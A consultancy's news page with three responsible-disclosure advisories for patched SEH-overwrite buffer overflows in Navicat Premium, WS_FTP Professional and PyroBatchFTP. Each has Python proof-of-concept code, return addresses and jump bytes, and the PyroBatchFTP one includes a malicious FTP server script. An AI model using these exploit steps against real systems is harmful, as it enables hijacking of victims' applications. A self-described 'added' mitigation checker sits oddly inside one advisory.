Scottish SMEs and Third Sector Organisations Eligible for CE and CE Plus Vouchers

In June of this year, the Scottish Government set out its ongoing commitment to developing Safe, Secure and Prosperous: A Cyber Resilience Strategy for Scotland. As part of this, it has made £500,000 available under the National Cyber Security Programme for a voucher scheme to support small and medium-sized private and third sector organisations in Scotland. The funding is intended to enable those organisations to achieve the National Cyber Security Centre (NCSC) endorsed Cyber Essentials or Cyber Essentials Plus certification.

Organisations can apply for the grant funding online and, if approved, will be able to access the money once they have achieved Cyber Essentials accreditation. As an independent technical information assurance consultancy, 7 Elements is well placed to support your organisation through the process of gaining Cyber Essentials certification. All of our staff are highly technical and therefore our Cyber Essentials assessors are well qualified to assist you through the process. More information on the Cyber Essentials process can be found here: https://www.7elements.co.uk/services/cyber-essentials/

As of today (7th November 2018), the scheme is live and you can apply for your voucher of up to £1000 to achieve Cyber Essentials certification. The scheme will run for 12 months or until the vouchers have been exhausted.

Scotland based small and medium-sized private sector organisations can apply via a portal on the Scottish Enterprise website below:
https://www.scottish-enterprise.com/

Third sector organisations can apply via a portal on the Scottish Council Voluntary Organisations (SCVO) website below:
https://scvo.org.uk/digital/

Best Customer Experience Award Nomination 2018

We are thrilled to have been nominated for the ‘Best Customer Experience’ award at the 2018 Scottish Cyber Awards!

The Scottish Cyber Awards are back for their third year, and we are delighted to have been nominated for the ‘Best Customer Experience’ award. This nomination means even more to us because all recommendations come from end-users who have directly used the services of a Scottish based cyber security organisation, which is a massive honour. We are delighted to be in such good company with Quorum Cyber and Seric Systems.

The customer experience award aims to credit organisations that are dedicated to providing outstanding service: companies that have gone over and above what is expected to offer excellent service and that act as a standard for organisations across the industry to aim for over the coming year (SBRC 2018).

David and his team are customer experience wizards – whenever I need their services, they’re there. Dependable, adaptive, clear and reliable. On all the engagements I’ve worked on with 7 Elements I’ve been impressed by David and his team’s responsiveness and capabilities. Genuine passion for the area rather than being sales driven. This goes a long way with me and I’ll keep going back to them on this basis. – 7 Elements Nomination

The winner of this award will be decided via public vote and we hope that we can rely on yours! Voting closes on the 30th October and you can place your votes here:

https://www.scottishcyberawards.co.uk

The winner will be announced at the awards dinner on the 28th November at the Sheraton Hotel.

ZoneFox Collaboration

We are excited to announce our recent partnership with ZoneFox, to enhance our award winning Incident Response Service.

At 7 Elements we work with clients across the globe, providing expertise in technical information assurance. We use an event-driven approach to Incident Response encompassing five key stages: situational awareness; establishing response parameters; resource deployment; establishing compromise zone and incident classification; followed by incident containment and remediation.

To enhance our situational awareness capability we have partnered with ZoneFox and will be able to deploy the ZoneFox agent as part of our initial response activity.

The ZoneFox solution monitors user behaviour and data movement both on and off the network, alerting on malicious or anomalous behaviour. This is achieved through user and entity behaviour analytics (UEBA) and machine-learning technology that provides 360-degree visibility across the network and beyond.

Jamie Graves, CEO, ZoneFox said: “Through our work with clients it is becoming increasingly clear that the majority are now using the platform as a cornerstone of their Incident Response strategy. The data and evidence the platform delivers to the business makes it easy to pinpoint vulnerabilities and devise a remediation plan. We’re delighted to be working with 7 Elements and this is definitely an area of the business we will be looking to grow.”

Navicat Premium Oracle Connection Buffer Overflow (SEH overwrite) Vulnerability

Advisory Information

Title: Navicat Premium Oracle Connection Buffer Overflow (SEH overwrite)

Date Published: 01/05/2018

Advisory Summary

Entering an excessively long string of characters into the ‘host’ field when creating a new Oracle connection causes the program to crash. Because address space layout randomisation (ASLR) is not enabled for the software, an attacker can reliably hijack the execution flow of the application.

Vendor

PremiumSoft CyberTech Ltd

Affected Software

Product: Navicat Premium
Version: <= 12.0.26

Description of Issue

A buffer overflow vulnerability was discovered in Navicat Premium version 12.0.26. This vulnerability was found in the “New Connection” component of the application. Entering an excessively long string into the host field of a new Oracle connection will cause the program to crash. This crash, combined with ASLR not being enabled for the application, allows an attacker to overwrite the structured exception handler (SEH) record and hijack the execution flow of the application. This issue was tested on a 32-bit Windows 7 host.
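The missing ASLR noted above is recorded in the image's PE optional header, so a defender can check a binary for it before deployment. The following is an added example, not part of this advisory or of the vendor's software: it parses the DllCharacteristics field and reports the DYNAMIC_BASE (ASLR), NX_COMPAT (DEP), NO_SEH and GUARD_CF flags. The sample header bytes are constructed inline; SafeSEH lives in the load config directory and is not parsed here.

```python
import struct

# DllCharacteristics flags from the PE optional header (values from winnt.h).
DYNAMIC_BASE = 0x0040  # IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE: ASLR opt-in
NX_COMPAT = 0x0100     # IMAGE_DLLCHARACTERISTICS_NX_COMPAT: DEP opt-in
NO_SEH = 0x0400        # IMAGE_DLLCHARACTERISTICS_NO_SEH: image never uses SEH
GUARD_CF = 0x4000      # IMAGE_DLLCHARACTERISTICS_GUARD_CF: Control Flow Guard


def pe_mitigations(data):
    """Report which exploit mitigations a PE image opts into (SafeSEH not checked)."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: bad PE signature")
    coff = e_lfanew + 4
    size_of_optional = struct.unpack_from("<H", data, coff + 16)[0]
    if size_of_optional < 72:
        raise ValueError("optional header too short to hold DllCharacteristics")
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    # DllCharacteristics is at offset 70 in both PE32 (0x10b) and PE32+ (0x20b).
    dllchars = struct.unpack_from("<H", data, opt + 70)[0]
    return {
        "pe32plus": magic == 0x20B,
        "aslr": bool(dllchars & DYNAMIC_BASE),
        "dep": bool(dllchars & NX_COMPAT),
        "no_seh": bool(dllchars & NO_SEH),
        "cfg": bool(dllchars & GUARD_CF),
    }


def check_file(path):
    """Run the check against an executable or DLL on disk."""
    with open(path, "rb") as f:
        return pe_mitigations(f.read())


def build_test_pe(dllchars):
    """Constructed minimal PE32 header (no sections) used only for testing."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)  # e_lfanew: PE header follows DOS header
    coff = struct.pack("<HHIIIHH", 0x014C, 0, 0, 0, 0, 96, 0x0102)  # i386, no sections, 96-byte opt hdr
    opt = bytearray(96)
    struct.pack_into("<H", opt, 0, 0x010B)  # PE32 magic
    struct.pack_into("<H", opt, 70, dllchars)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)
```

An image reporting `aslr: False` is one whose load address is fixed, which is the condition that makes the hard-coded POP POP RET address in this advisory work every time.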

PoC

The following proof of concept python script will generate a text file with a string to overwrite SEH. Once the file is generated, copy the contents of navicatPOC.txt and paste into the host field of a new Oracle connection. Test the connection to trigger the crash.



#!/usr/bin/python
# Title: Navicat < 12.0.27 Oracle Connection Overflow
# Author: Kevin McGuigan
# Twitter: @_h3xagram
# Author Website: https://www.7elements.co.uk
# Vendor Website: https://www.navicat.com
# Date: 01/05/2018
# Version: 12.0.26
# Tested on Windows 7 32-bit
# Vendor notified on 04/04/2018. Patch issued on 25/04/2018.

# Generate file > Create new Oracle Connection > paste contents of "navicatPOC.txt" into host field and test connection to trigger overflow.
filename = "navicatPOC.txt"
junk = "A" * 1502          # padding up to the SEH record
# nseh = "\x4C\x4C\x77\x04"  # short jump over the SEH record to the payload area
# seh = "\x75\x2a\x01\x10"   # POP POP RET at 0x10012a75
nseh = "B" * 4             # placeholder nSEH, visible as 42424242 in the debugger
seh = "C" * 4              # placeholder SEH, visible as 43434343 in the debugger
fill = "D" * 4000          # payload area
buffer = junk + nseh + seh + fill
with open(filename, "w") as textfile:
    textfile.write(buffer)

This will result in an SEH overwrite, as demonstrated by the following screenshot:

[Screenshot: SEH Overwrite]

From here, we can replace SEH with the address of a POP POP RET sequence, located at 0x10012a75:

seh= "\x75\x2a\x01\x10"

And replace nSEH with the following code to jump to our payload:

nseh = "\x4C\x4C\x77\x04"

This will land at the payload, represented in the proof of concept by the character ‘D’ (\x44).

Remediation

This issue has been patched and the patch notes can be found here.

The latest version of Navicat Professional can be found on the Navicat website.

Timeline

Advisory sent – 4th April 2018

Requested confirmation that advisory has been received by Navicat – 9th April 2018

Confirmation of the issue by Navicat – 9th April 2018

Patch released by Navicat – 26th April 2018

Advisory published by 7 Elements – 1st May 2018

CVE-2017-16513 – Ipswitch WS_FTP Professional Local Buffer Overflow (SEH overwrite)

Advisory Information

Title: CVE-2017-16513 Ipswitch WS_FTP Professional Local Buffer Overflow (SEH overwrite)

Date Published: 03/11/2017

Advisory Summary

The application accepts user input to perform a local search function. Entering an excessively long string of characters causes the program to crash and allows an attacker to gain control of the execution flow of the application. This issue also impacts the “backup location” field.

Vendor

Ipswitch

Affected Software

Product: Ipswitch WS_FTP Professional
Version: 12.6.03

Description of Issue

A local buffer overflow vulnerability was discovered in Ipswitch WS_FTP Professional version 12.6. This vulnerability was found in the “local search” component of the application. Entering a search string longer than 779 characters will cause the program to crash. It is possible to overwrite the structured exception handler (SEH) after an offset of 840 characters and hijack execution flow of the application. This issue also impacts the “backup location” field and was tested on a 32-bit Windows 7 host.

PoC

The following proof of concept python script will generate a text file with a string to overwrite SEH. Once the file is generated, copy the contents of poc.txt and paste into the local search field to trigger the crash.



#!/usr/bin/python
#Title: Ipswitch WS_FTP Professional Local Buffer Overflow (SEH overwrite)
#Author: Kevin McGuigan
#Author Website: https://www.7elements.co.uk
#Vendor Website: https://www.ipswitch.com
#nSEH = "\x74\x08\x90\x90"  # short jump forward over the SEH record
#SEH = "\x31\x2D\x91\x23"   # POP POP RET at 0x23912D31

buffer = "A" * 840  # padding up to the SEH record (offset 840)
nSEH = "B" * 4      # placeholder nSEH, visible as 42424242 in the debugger
SEH = "C" * 4       # placeholder SEH, visible as 43434343 in the debugger

with open("poc.txt", "w") as f:
    f.write(buffer + nSEH + SEH + "D" * 200)  # "D" marks the payload area

This will trigger an SEH overwrite, as demonstrated by the following screenshot:

[Screenshot: SEH Overwrite]

From here, we can replace SEH with the address of a POP POP RET sequence, located at:

23912D31

And replace nSEH with the following code to jump to our payload:

"\x74\x08\x90\x90"

This will land at the payload, represented in the proof of concept by the character ‘D’ (\x44).

[Screenshot: SEH Overwrite]

A short video proof-of-concept can be seen below:

Remediation

This issue has been patched and the patch notes can be found here.

The latest version of Ipswitch WS_FTP Professional can be found on the Ipswitch website.

Timeline

Initial request for security contact via vendor website – 20th September 2017

Second request sent to vendor – 4th October 2017

Response from security contact, advisory sent – 5th October 2017

Video poc requested by vendor – 10th October 2017

Video poc sent – 10th October 2017

Fix verified by both parties – 20th October 2017

Patch Released – 2nd November 2017

Advisory Released – 3rd November 2017

CVE-2017-15035 PyroBatchFTP Buffer Overflow (SEH Overwrite)

Advisory Information

Title: PyroBatchFTP Buffer Overflow (SEH Overwrite)

Date Published: 04/10/2017

Advisory Summary

It is possible to cause a buffer overflow in PyroBatchFTP when a client connects to an FTP server with an excessively long current directory string.

Vendor

Emtec

Affected Software

Product: PyroBatchFTP
Version: 3.17

Description of Issue

A buffer overflow vulnerability was discovered in the PyroBatchFTP client version 3.17. This vulnerability occurs after successfully connecting to an FTP server that returns a current directory string longer than 2265 characters. It is also possible to overwrite the Structured Exception Handler (SEH) and potentially hijack the execution flow of the application.

PoC

The following proof of concept python script will initialise an FTP server on the host system. Connecting to the FTP server using PyroBatchFTP will trigger the buffer overflow.


#!/usr/bin/python

print("Pyro FTP Buffer Overflow (SEH) Server")

#Author: Kevin McGuigan
#Author Website: https://www.7elements.co.uk
#Vendor Website: https://www.emtech.com

import socket
import sys

# Overflow string: 2292 bytes of padding, 4 bytes for nSEH, 4 bytes for SEH, then filler.
buffer = "A" * 2292 + "B" * 4 + "C" * 4 + "D" * 800
port = 21

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("0.0.0.0", port))
    s.listen(5)
    print("[+] FTP server started on port: " + str(port) + "\r\n")
except socket.error:
    print("[-] Failed to bind the server to port: " + str(port) + "\r\n")
    sys.exit(1)

while True:
    conn, addr = s.accept()
    # Minimal FTP dialogue: banner, accept any USER/PASS, then return the oversized directory string.
    conn.send(b"220 Welcome to PyroBatchFTP Overflow!\r\n")
    print(conn.recv(1024))
    conn.send(b"331 OK\r\n")
    print(conn.recv(1024))
    conn.send(b"230 OK\r\n")
    print(conn.recv(1024))
    conn.send(('220 "' + buffer + '" is current directory\r\n').encode())

[Screenshot: SEH Overwrite]

Remediation

This issue has been patched and the patch notes can be found here.

The latest version of PyroBatchFTP can be found on the EmTec website.

Timeline

Reported – 16th September 2017

Vendor Response – 18th September 2017

Update Requested – 3rd October 2017

Vendor Response and Patch – 4th October 2017

Advisory Published – 4th October 2017